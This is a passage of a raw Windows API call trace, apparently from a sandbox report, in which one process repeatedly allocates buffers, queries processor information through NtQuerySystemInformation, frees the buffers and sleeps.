SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.803] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0189.803] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.804] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.804] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0189.804] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0189.805] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.805] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0189.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.810] Sleep (dwMilliseconds=0x110) [0190.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0190.068] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.069] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0190.069] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.070] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.070] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0190.070] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.071] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.071] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0190.071] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0190.072] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.072] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0190.073] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.073] Sleep (dwMilliseconds=0x110) [0190.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0190.162] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.163] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0190.163] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.164] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.164] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0190.164] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.165] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0190.165] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0190.166] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.166] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0190.167] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.171] Sleep (dwMilliseconds=0x110) [0190.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0190.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0190.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0190.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0190.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0190.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0190.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.380] Sleep (dwMilliseconds=0x110) [0190.400] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0190.400] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.401] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.401] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0190.401] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.402] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.403] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0190.403] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0190.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0190.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0190.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.407] Sleep (dwMilliseconds=0x110) [0190.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0190.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0190.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0190.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0190.568] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0190.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.568] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0190.569] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.569] Sleep (dwMilliseconds=0x110) [0190.619] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0190.619] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.620] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0190.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0190.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0190.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0190.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0190.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.629] Sleep (dwMilliseconds=0x110) [0190.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0190.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0190.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0190.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0190.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0190.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.680] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0190.681] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.681] Sleep (dwMilliseconds=0x110) [0190.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0190.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0190.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0190.786] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.786] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0190.787] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0190.787] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.788] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0190.788] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.788] Sleep (dwMilliseconds=0x110) [0190.899] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0190.899] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0190.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0190.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0190.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0190.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0190.916] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.916] Sleep (dwMilliseconds=0x110) [0190.929] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0190.929] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.929] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.930] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0190.930] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.931] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.931] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0190.931] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.932] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0190.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0190.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0190.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.940] Sleep (dwMilliseconds=0x110) [0190.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0190.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0190.958] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0190.959] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0190.960] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.960] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0190.961] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0190.961] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.961] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0190.962] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0190.962] Sleep (dwMilliseconds=0x110) [0191.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0191.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.021] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0191.021] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.022] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0191.022] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.023] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.023] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0191.023] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0191.024] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.024] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0191.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.029] Sleep (dwMilliseconds=0x110) [0191.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0191.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0191.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0191.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0191.083] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0191.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0191.085] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0191.085] Sleep (dwMilliseconds=0x110) [0191.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0191.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0191.343] HeapFree (in: 